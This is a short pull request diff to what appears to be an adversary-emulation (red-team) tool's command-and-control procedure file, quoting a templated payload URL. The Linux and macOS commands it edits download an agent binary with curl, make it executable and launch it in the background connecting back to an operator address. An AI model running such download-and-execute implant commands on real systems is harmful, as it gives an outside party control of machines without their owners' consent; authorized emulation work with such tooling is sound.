### PR TITLE
payload download url needs quotes for when launching VMs

### DIFF
--- a/ttps/command-and-control/5f9001dc-e179-451f-bbd1-9fb4466d7057.yml
+++ b/ttps/command-and-control/5f9001dc-e179-451f-bbd1-9fb4466d7057.yml
@@ -23,14 +23,14 @@ platforms:
   linux:
     sh:
       command: |
-        curl #{payload.url} > /tmp/pneuma && 
+        curl "#{payload.url}" > /tmp/pneuma && 
         chmod +x /tmp/pneuma && 
         nohup /tmp/pneuma -name "$(hostname)" -address #{operator.tcp} &
       payload: pneuma-linux
   darwin:
     sh:
       command: |
-        curl #{payload.url} > /tmp/pneuma && 
+        curl "#{payload.url}" > /tmp/pneuma && 
         chmod +x /tmp/pneuma && 
         nohup /tmp/pneuma -name "$(hostname)" -address #{operator.tcp} &
       payload: pneuma-darwin


### PR DESCRIPTION
re: https://github.com/preludeorg/operator/issues/3565